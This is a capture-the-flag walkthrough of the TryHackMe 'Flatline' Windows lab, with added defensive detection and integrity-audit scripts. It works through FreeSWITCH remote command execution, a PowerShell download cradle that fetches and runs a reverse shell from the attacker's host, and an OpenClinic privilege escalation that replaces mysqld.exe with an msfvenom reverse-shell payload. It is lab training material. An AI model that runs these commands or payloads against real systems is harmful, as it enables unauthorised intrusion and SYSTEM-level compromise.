DEV Community

Krishna

TryHackMe Flatline Walkthrough

TryHackMe page for this machine => https://tryhackme.com/room/flatline

NOTE: I had to terminate and start the machine multiple times, as the exploit needed for foothold timed out multiple times. You may have to do the same.

Enum

rustscan nmap

rustscan -a 10.10.98.113 -- -A -Pn

Open 10.10.98.113:3389
Open 10.10.98.113:8021

PORT     STATE SERVICE          REASON  VERSION
3389/tcp open  ms-wbt-server    syn-ack Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: WIN-EOM4PK0578N
|   NetBIOS_Domain_Name: WIN-EOM4PK0578N
|   NetBIOS_Computer_Name: WIN-EOM4PK0578N
|   DNS_Domain_Name: WIN-EOM4PK0578N
|   DNS_Computer_Name: WIN-EOM4PK0578N
|   Product_Version: 10.0.17763
|_  System_Time: 2022-11-06T09:40:13+00:00
| ssl-cert: Subject: commonName=WIN-EOM4PK0578N
| Issuer: commonName=WIN-EOM4PK0578N
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-05T09:12:21
| Not valid after:  2023-05-07T09:12:21
| MD5:   3090 28ea a18f 37ce f134 275b 8a11 85b7
| SHA-1: 0594 e942 a7b3 ca04 7e4e 625c 6c0b 6903 f089 dde0
|_ssl-date: 2022-11-06T09:40:13+00:00; 0s from scanner time.
8021/tcp open  freeswitch-event syn-ack FreeSWITCH mod_event_socket
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s


Note: the machine blocks ICMP ping probes, so pass the nmap -Pn flag when enumerating it.

Port 3389 Enumeration

Let's use some nmap scripts to enumerate the port some more.

└─$ sudo nmap --script="rdp-*" -p 3389 flatline.thm -vv -Pn

PORT     STATE SERVICE       REASON
3389/tcp open  ms-wbt-server syn-ack ttl 127
| rdp-ntlm-info: 
|   Target_Name: WIN-EOM4PK0578N
|   NetBIOS_Domain_Name: WIN-EOM4PK0578N
|   NetBIOS_Computer_Name: WIN-EOM4PK0578N
|   DNS_Domain_Name: WIN-EOM4PK0578N
|   DNS_Computer_Name: WIN-EOM4PK0578N
|   Product_Version: 10.0.17763
|_  System_Time: 2022-11-06T09:55:55+00:00
| rdp-enum-encryption: 
|   Security layer
|     CredSSP (NLA): SUCCESS
|     CredSSP with Early User Auth: SUCCESS
|_    RDSTLS: SUCCESS


Port 8021 Enumeration

I wanted to see what in the world FreeSWITCH is. From Wikipedia (https://en.wikipedia.org/wiki/FreeSWITCH):

*FreeSWITCH is free and open-source server software for real-time communication applications, including WebRTC, video, and voice over Internet Protocol (VoIP). It runs on Linux, Windows, macOS, and FreeBSD. FreeSWITCH is used to build private branch exchange (PBX) telecommunication systems, IVR services, videoconferencing with chat and screen sharing, wholesale least-cost routing, Session Border Controller (SBC) and embedded communication appliances.*

Let's look for some vulnerabilities.

└─$ searchsploit freeswitch                                
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
FreeSWITCH - Event Socket Command Execution (Metasploit)                                                                   | multiple/remote/47698.rb
FreeSWITCH 1.10.1 - Command Execution                                                                                      | windows/remote/47799.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results


Interesting. Let's try and get RCE without Metasploit.

Foothold

RCE without Metasploit

Using the script present here => https://www.exploit-db.com/exploits/47799

└─$ python3 exploit.py flatline.thm whoami
Authenticated
Content-Type: api/response
Content-Length: 25

win-eom4pk0578n\nekrotic


Looks like it works! Let's try and get a proper shell going on here.

└─$ python3 exploit.py 10.10.7.242 dir   
Authenticated
Content-Type: api/response
Content-Length: 2346

 Volume in drive C has no label.
 Volume Serial Number is 84FD-2CC9

 Directory of C:\Program Files\FreeSWITCH

09/11/2021  07:38    <DIR>          .
09/11/2021  07:38    <DIR>          ..
09/11/2021  07:22    <DIR>          cert
09/11/2021  07:22    <DIR>          conf
06/11/2022  10:33    <DIR>          db
09/11/2021  07:18    <DIR>          fonts
20/08/2019  12:08         4,991,488 FreeSwitch.dll
20/08/2019  12:08            26,624 FreeSwitchConsole.exe
20/08/2019  12:19            62,976 fs_cli.exe
09/11/2021  07:18    <DIR>          grammar
---
SNIP
---
24/03/2018  20:20        15,766,528 v8.dll
24/03/2018  20:05           177,152 v8_libbase.dll
24/03/2018  20:19           134,656 v8_libplatform.dll
03/04/2018  14:01           126,976 zlib.dll
              28 File(s)     96,800,060 bytes
              17 Dir(s)  50,476,666,880 bytes free


Let's try and get the user flag.

└─$ python3 exploit.py 10.10.7.242 "dir C:\\Users\\"
Authenticated
Content-Type: api/response
Content-Length: 405

 Volume in drive C has no label.
 Volume Serial Number is 84FD-2CC9

 Directory of C:\Users

09/11/2021  07:28    <DIR>          .
09/11/2021  07:28    <DIR>          ..
09/11/2021  07:13    <DIR>          Administrator
09/11/2021  07:37    <DIR>          Nekrotic
09/11/2021  07:13    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)  50,457,559,040 bytes free

└─$ python3 exploit.py 10.10.7.242 "dir C:\\Users\\Nekrotic\\Desktop\\"
Authenticated
Content-Type: api/response
Content-Length: 374

 Volume in drive C has no label.
 Volume Serial Number is 84FD-2CC9

 Directory of C:\Users\Nekrotic\Desktop

09/11/2021  07:39    <DIR>          .
09/11/2021  07:39    <DIR>          ..
09/11/2021  07:39                38 root.txt
09/11/2021  07:39                38 user.txt
               2 File(s)             76 bytes
               2 Dir(s)  50,446,991,360 bytes free



Wow. We seem to have found both files. We can read user.txt.

But we can't read root.txt. Probably a permissions issue.

Let's get a PowerShell reverse shell to see what's really going on.

PowerShell Reverse Shell

  1. Save this file: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1
  2. Delete the second shell one-liner. Uncomment the first one and replace the IP and port with those of your listener.
  3. Start a Python web server in the folder where you saved the PowerShell script; this is what serves the script to the target.
  4. Download and execute the script on the remote machine using the FreeSWITCH exploit.

Running the exploit

┌──(kali㉿kali)-[~/Documents/ctf/thm_easy_flatline]
└─$ python3 exploit.py 10.10.7.242 "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.14.31.78/Invoke-PowerShellTcpOneLine.ps1')"

Run the web server to serve the PowerShell reverse shell

└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.7.242 - - [06/Nov/2022 06:20:12] "GET /Invoke-PowerShellTcpOneLine.ps1 HTTP/1.1" 200 -

Reverse Shell listener

┌──(kali㉿kali)-[~]
└─$ ncat -lnvp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.7.242.
Ncat: Connection from 10.10.7.242:49899.

PS C:\Program Files\FreeSWITCH> gci


    Directory: C:\Program Files\FreeSWITCH


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       09/11/2021     07:22                cert                                                                  
d-----       09/11/2021     07:22                conf                                                                  
d-----       06/11/2022     10:33                db                                                                    
d-----       09/11/2021     07:18                fonts                                                                 
d-----       09/11/2021     07:18                grammar    
....
SNIP
....

PS C:\Users\Nekrotic\Desktop> get-acl -path user.txt

    Directory: C:\Users\Nekrotic\Desktop

Path     Owner                    Access                                                                               
----     -----                    ------                                                                               
user.txt WIN-EOM4PK0578N\Nekrotic NT AUTHORITY\SYSTEM Allow  FullControl...  

PS C:\Users\Nekrotic\Desktop> get-acl -Path root.txt

    Directory: C:\Users\Nekrotic\Desktop

Path     Owner               Access                                
----     -----               ------                                
root.txt NT AUTHORITY\SYSTEM NT AUTHORITY\SYSTEM Allow  FullControl

Now we can see why we can't read root.txt. We will need to escalate privileges to be able to read the file.
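The foothold chain above leaves two clear signals in process-creation telemetry: the FreeSWITCH service process spawning a shell, and a PowerShell download cradle on the command line. The following is an added detection example written for this walkthrough, not code from the original post; it assumes Sysmon-style field names (Image, ParentImage, CommandLine) and that FreeSWITCH runs on Windows as FreeSwitchConsole.exe, the binary listed in the install directory above. The log lines are constructed.

```python
"""Detection logic for the foothold chain on this page: FreeSWITCH's process
spawning a shell, and a PowerShell download cradle. Sample events are
constructed here; field names mimic Sysmon Event ID 1 but are an assumption."""
from __future__ import annotations
import re
from dataclasses import dataclass

# Assumption: on Windows, FreeSWITCH runs as FreeSwitchConsole.exe (it is listed in
# the install directory on this page); a shell spawned by it is suspicious.
FREESWITCH_IMAGES = {"freeswitchconsole.exe", "freeswitch.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# The cradle used on this page: IEX (New-Object Net.WebClient).DownloadString('http://...')
CRADLE_RE = re.compile(
    r"(?:iex|invoke-expression)\b.*?(?:net\.webclient|downloadstring\s*\()", re.I)

@dataclass
class ProcEvent:
    image: str
    parent_image: str
    command_line: str

def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event matches (empty list = benign)."""
    hits = []
    if basename(ev.parent_image) in FREESWITCH_IMAGES and basename(ev.image) in SHELL_IMAGES:
        hits.append("freeswitch_spawned_shell")
    if CRADLE_RE.search(ev.command_line):
        hits.append("powershell_download_cradle")
    return hits

def parse_line(line: str) -> ProcEvent:
    """Parse one constructed 'Key=value|Key=value' event line."""
    fields = dict(kv.split("=", 1) for kv in line.strip().split("|"))
    return ProcEvent(fields["Image"], fields["ParentImage"], fields["CommandLine"])

# Constructed sample events (not real telemetry): one benign, two malicious.
SAMPLE_LOG = """\
Image=C:\\Windows\\System32\\cmd.exe|ParentImage=C:\\Windows\\explorer.exe|CommandLine=cmd /c dir
Image=C:\\Windows\\System32\\cmd.exe|ParentImage=C:\\Program Files\\FreeSWITCH\\FreeSwitchConsole.exe|CommandLine=cmd /c whoami
Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|ParentImage=C:\\Windows\\System32\\cmd.exe|CommandLine=powershell IEX (New-Object Net.WebClient).DownloadString('http://10.14.31.78/Invoke-PowerShellTcpOneLine.ps1')
"""

def scan(log_text: str) -> list[tuple[int, list[str]]]:
    """Return (line_number, rule_names) for every event that matched a rule."""
    results = []
    for n, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        hits = classify(parse_line(line))
        if hits:
            results.append((n, hits))
    return results

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}")
```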

Privesc

While taking a look around the system, I came across this on the Administrator's desktop:


PS C:\Users\Administrator\Desktop> gci

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----       08/11/2021     18:24      108048384 FreeSWITCH-1.10.1-Release-x64.msi                                     
-a----       08/11/2021     06:05      413584335 OpenClinicSetup5.194.18_32bit_full_fr_en_pt_es_nl.exe 


I am guessing this OpenClinic software is installed. Looking around the system further, we find its installation location at C:\projects\openclinic.


PS C:\projects\openclinic> gci

    Directory: C:\projects\openclinic

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       09/11/2021     07:29                jdk1.8                                                                
d-----       09/11/2021     07:19                mariadb                                                               
d-----       09/11/2021     07:30                tomcat8                                                               
d-----       09/11/2021     07:29                Uninstall                                                             
-a----       06/04/2021     23:14            250 configureCountry.bat                                                  
-a----       01/07/2021     18:20            167 configureLanguage.bat                                                 
-a----       09/11/2021     07:18         334840 lua5.1.dll                                                            
-a----       07/06/2021     16:58          93696 OpenClinic GA login.exe                                               
-a----       08/05/2020     12:17          27136 OpenClinicStartServices.exe                                           
-a----       02/05/2021     00:45            316 stopOpenClinicHttp.bat                                                
-a----       09/11/2021     07:18        1389568 uninstall.exe   


Let's see what we can do with this.

┌──(kali㉿kali)-[~/Documents/ctf_tools]
└─$ searchsploit openclinic
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenClinic GA 5.194.18 - Local Privilege Escalation                                                                        | windows/local/50448.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------


Details of this exploit here => https://www.exploit-db.com/exploits/50448

According to the exploit's instructions, we need to replace the mysqld.exe in the OpenClinic installation with a payload we generate ourselves.

Let's see if we have the permissions to do that.


PS C:\projects\openclinic\mariadb\bin> get-acl -Path .

    Directory: C:\projects\openclinic\mariadb

Path Owner                  Access                                                                                     
---- -----                  ------                                                                                     
bin  BUILTIN\Administrators NT AUTHORITY\SYSTEM Allow  FullControl...

PS C:\projects\openclinic\mariadb\bin> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes                                                     
============================================================= ================ ============ ===============================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Mandatory group, Enabled by default, Enabled group             
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\BATCH                                            Well-known group S-1-5-3      Mandatory group, Enabled by default, Enabled group             
CONSOLE LOGON                                                 Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group             
LOCAL                                                         Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group             
Mandatory Label\High Mandatory Level                          Label            S-1-16-12288                                                     


Looks like we can: the bin directory is owned by BUILTIN\Administrators, and whoami /groups shows our shell is already a member of that group running at High Mandatory Level.

Let's begin.

Generate Payload

On our machine.

└─$ msfpc powershell 10.14.31.78 443 cmd reverse stageless exe
 [*] MSFvenom Payload Creator (MSFPC v1.4.5)
 [i]   IP: 10.14.31.78
 [i] PORT: 443
 [i] TYPE: windows (windows/shell_reverse_tcp)
 [i]  CMD: msfvenom -p windows/shell_reverse_tcp -f exe \
  --platform windows -a x86 -e generic/none LHOST=10.14.31.78 LPORT=443 \
  > '/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443.exe'

 [i] windows shell created: '/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443.exe'

 [i] MSF handler file: '/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443-exe.rc'
 [i] Run: msfconsole -q -r '/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443-exe.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!

└─$ mv windows-shell-stageless-reverse-tcp-443.exe mysqld.exe

On the server.

We will have to restart the computer as per the exploit instructions.

PS C:\projects\openclinic\mariadb\bin> mv mysqld.exe mysqld.exe.bak

PS C:\projects\openclinic\mariadb\bin> IWR -Uri http://10.14.31.78/mysqld.exe -OutFile mysqld.exe                    

PS C:\projects\openclinic> Restart-Computer 


Now we wait for our reverse shell to activate.


└─$ ncat -lnvp 443
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.52.62.
Ncat: Connection from 10.10.52.62:49669.
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
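
The privilege escalation above is a plain service-binary swap: the vendor's mysqld.exe is renamed to mysqld.exe.bak and a payload takes its place, so a file-integrity baseline of the service's bin directory catches it on the next audit. The following is an added defender-side example written for this walkthrough, not code from the original post or from OpenClinic; the directory, file contents and baseline are constructed in a temporary folder so it runs offline.

```python
"""Integrity audit of a service's bin directory, as a defender would run it
after the OpenClinic chain on this page: the attacker renamed mysqld.exe to
mysqld.exe.bak and dropped a payload under the original name. Everything here
is built in a temporary directory with constructed file contents."""
from __future__ import annotations
import hashlib
import os
import tempfile

def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def baseline(bin_dir: str) -> dict[str, str]:
    """Record the SHA-256 of every file in a known-good install directory."""
    return {name: sha256_file(os.path.join(bin_dir, name))
            for name in sorted(os.listdir(bin_dir))}

def audit(bin_dir: str, expected: dict[str, str]) -> list[str]:
    """Return findings: hash mismatches, missing files, unexpected new files,
    and a leftover '<name>.bak' sibling of a binary that is in the baseline."""
    findings = []
    present = set(os.listdir(bin_dir))
    for name, digest in expected.items():
        if name not in present:
            findings.append(f"missing: {name}")
        elif sha256_file(os.path.join(bin_dir, name)) != digest:
            findings.append(f"modified: {name}")
    for name in sorted(present - expected.keys()):
        stem = name[:-4] if name.endswith(".bak") else None
        if stem in expected:
            findings.append(f"backup of baseline binary left behind: {name}")
        else:
            findings.append(f"unexpected file: {name}")
    return findings

def demo() -> list[str]:
    """Simulate the swap performed on this page in a temp dir; return the audit findings."""
    with tempfile.TemporaryDirectory() as d:
        # Constructed stand-ins for the vendor binaries (not the real files).
        orig = os.path.join(d, "mysqld.exe")
        with open(orig, "wb") as f:
            f.write(b"MZ" + b"\x00" * 64 + b"vendor mysqld")
        with open(os.path.join(d, "mysql.exe"), "wb") as f:
            f.write(b"MZ" + b"\x00" * 64 + b"vendor client")
        expected = baseline(d)
        # The swap: keep the original as .bak, drop a payload under the original name.
        os.rename(orig, orig + ".bak")
        with open(orig, "wb") as f:
            f.write(b"MZ" + b"\x00" * 64 + b"attacker payload")
        return audit(d, expected)

if __name__ == "__main__":
    for line in demo():
        print(line)
```

Because the service runs as NT AUTHORITY\SYSTEM, the same ACL that let an administrator write mysqld.exe should be reviewed alongside the hash check; the audit only tells you the swap happened, not who could perform it.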


DONE! Go get that root flag!
